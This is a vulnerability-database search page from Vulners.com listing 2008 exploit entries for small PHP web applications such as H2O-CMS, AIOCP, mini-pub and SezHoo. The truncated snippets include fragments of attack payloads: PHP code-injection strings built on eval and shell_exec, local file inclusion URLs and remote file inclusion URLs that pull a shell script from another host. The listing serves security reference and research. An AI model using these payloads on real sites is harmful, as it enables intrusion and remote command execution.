CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

2611 matches found

seebug.org•added 2008/10/29 12:0 a.m.•22 views

H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = off)

No description provided by source. !/usr/bin/perl ---------------------------------------------------------- H2O-CMS = 3.4 Remote Command Execution Exploit mq = Off Discovered By StAkeRathotmaildotit Download On http://sourceforge.net/projects/h2o-cms...

Packet Storm•added 2008/10/28 12:0 a.m.•21 views

h2ocms-exec.txt

!/usr/bin/perl ---------------------------------------------------------- H2O-CMS '";""; errorreporting0; echo"//athos"; "', 'dbserver' = '";""; include$REQUEST"i"; "', 'dbname' = '";""; eval$REQUEST"g"; "', 'dbusername' = '";""; echo shellexec$REQUEST"c"; "', 'dbpassword' = '";""; echo...

Exploit DB•added 2008/10/28 12:0 a.m.•37 views

H2O-CMS 3.4 - Remote Command Execution

!/usr/bin/perl ---------------------------------------------------------- H2O-CMS '";""; errorreporting0; echo"//athos"; "', 'dbserver' = '";""; include$REQUEST"i"; "', 'dbname' = '";""; eval$REQUEST"g"; "', 'dbusername' = '";""; echo shellexec$REQUEST"c"; "', 'dbpassword' = '";""; echo...

Packet Storm•added 2008/10/28 12:0 a.m.•25 views

aiocp14-sql.txt

Aiocp 1.4 Remote SQL Injection vulnerability Found by : ExSploiters Contact : [email protected] Download : http://sourceforge.net/project/showfiles.php?groupid=159137&packageid=178594&releaseid=619157 PoC :...

Exploit DB•added 2008/10/27 12:0 a.m.•25 views

AIOCP 1.4 - 'poll_id' SQL Injection

Aiocp 1.4 Remote SQL Injection vulnerability Found by : ExSploiters Contact : [email protected] Download : http://sourceforge.net/project/showfiles.php?groupid=159137&packageid=178594&releaseid=619157 PoC :...

Packet Storm•added 2008/10/27 12:0 a.m.•25 views

picoflatcms060-lfi.txt

PicoFlatCMS 0.6.0 LFI http://www.sourceforge.net/projects/picoflatcms Same old thing: http://site/index.php?pagina=C:\boot.ini Fixme: if eregi"://", $pagina || eregi"?", $pagina $pagina = ""; include "notfound.php"; else include $pagina;...

exploitpack•added 2008/10/27 12:0 a.m.•11 views

AIOCP 1.4 - poll_id SQL Injection

AIOCP 1.4 - pollid SQL Injection Aiocp 1.4 Remote SQL Injection vulnerability Found by : ExSploiters Contact : [email protected] Download : http://sourceforge.net/project/showfiles.php?groupid=159137&packageid=178594&releaseid=619157 PoC :...

seebug.org•added 2008/10/26 12:0 a.m.•31 views

phpMyAdmin Theme变量本地文件包含漏洞

BUGTRAQ: 15169 phpMyAdmin在grabglobals.php中提供了registerglobals模拟层以确保同禁用了该功能的主机兼容。这个文件通常包含在最开端，这样在全局化请求变量时不会覆盖已在使用的脚本变量。但phpMyAdmin还捆绑了一些不应直接调用的文件，以及一些在开端没有包含grabglobals.php但包含了common.lib.php的文件，可能导致如下所示的包含树： - dbdetailsdbinfo.php \ libraries/common.lib.php \ libraries/selectlang.lib.php \ ...

Packet Storm•added 2008/10/23 12:0 a.m.•21 views

txtshop-lfi.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- txtshop - beta 1.0 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Program: txtshop $ Version: eNYe-Sec - www.enye-sec.org --Bug -- 4. if !$language$language="ch"; 5...

Exploit DB•added 2008/10/23 12:0 a.m.•31 views

txtshop 1.0b (Windows) - 'Language' Local File Inclusion

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- txtshop - beta 1.0 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Program: txtshop $ Version: eNYe-Sec - www.enye-sec.org --Bug -- 4. if !$language$language="ch"; 5...

exploitpack•added 2008/10/22 12:0 a.m.•8 views

phpcrs 2.06 - importFunction Local File Inclusion

phpcrs 2.06 - importFunction Local File Inclusion -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- phpcrs eNYe-Sec - www.enye-sec.org --Bug -- 151. elseif isset $btnStartImport 152. require"../inc/frmDoImport.inc.php"; 153. require"../inc/". $importFunction .".inc.php"; 154...

seebug.org•added 2008/10/22 12:0 a.m.•32 views

nfs-utils软件包hosts_ctl()函数绕过安全限制漏洞

BUGTRAQ ID: 31823 CVECAN ID: CVE-2008-4552 nfs-utils软件包可提供内核NFS服务器和相关工具的守护程序。 nfs-utils软件包的TCP封装程序实现用错误的参数序列调用了hostsctl函数，远程攻击者可以绕过对NFS netgroup所实施的访问控制规则，获得对受限服务的访问。 sourceforge nfs-utils 1.0.9 sourceforge ----------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://freshmeat.net/projects/nfs-utils/...

7.5CVSS7.5AI score0.01355EPSS

seebug.org•added 2008/10/19 12:0 a.m.•18 views

Meeting Room Booking System (MRBS) < 1.4 SQL Injection Exploit

No description provided by source. "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource computer, planes, whatever you want". Web CM...

exploitpack•added 2008/10/18 12:0 a.m.•14 views

Meeting Room Booking System (MRBS) 1.4 - SQL Injection

Meeting Room Booking System MRBS 1.4 - SQL Injection "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource computer, planes, whatever...

Exploit DB•added 2008/10/16 12:0 a.m.•46 views

IP Reg 0.4 - Multiple SQL Injections

IP Reg = 0.4 Multiple Remote SQL Injection Vulnerabilities url: http://sourceforge.net/projects/ipreg/ Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational purpose. Use it at your own risk. Author will be...

Packet Storm•added 2008/10/16 12:0 a.m.•17 views

ipreg04-sql.txt

IP Reg = 0.4 Multiple Remote SQL Injection Vulnerabilities url: http://sourceforge.net/projects/ipreg/ Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational purpose. Use it at your own risk. Author will be...

Exploit DB•added 2008/10/14 12:0 a.m.•33 views

SezHoo 0.1 - Remote File Inclusion

Author : DaRkLiFe Greetz : str0ke & S.W.A.T. & funkys0ul Script : SezHoo 0.1 Remote File Inclusion Vulnerability Download: http://downloads.sourceforge.net/sezhoo/sezhoo.tar.gz?modtime=1220554562&bigmirror=0 Exploit : http://site.com/sezhoo/SezHooTabsAndActions.php?IP=Sh3lLz? Vulnerable : line 21...

Exploit DB•added 2008/10/12 12:0 a.m.•28 views

mini-pub 0.3 - Local Directory Traversal / File Disclosure

| | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | mini-pub.php = v0.3 Local Directory Traversal / File Disclosure Vulnerabilities Script : http://mini-pub.sourceforge.net/ I- Local Directory Traversal POC :...

Exploit DB•added 2008/10/12 12:0 a.m.•43 views

mini-pub 0.3 - File Disclosure / Code Execution

mini-pub 0.3 multiple vulnerabilities download http://sourceforge.net/projects/mini-pub/ author muuratsalo contact muuratsaloatgmail.com exploits 1. local file disclosure http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt? 2. local file disclosure...

exploitpack•added 2008/10/12 12:0 a.m.•12 views

mini-pub 0.3 - Local Directory Traversal File Disclosure

mini-pub 0.3 - Local Directory Traversal File Disclosure | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | mini-pub.php = v0.3 Local Directory Traversal / File Disclosure Vulnerabilities Script : http://mini-pub.sourceforge.net/...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by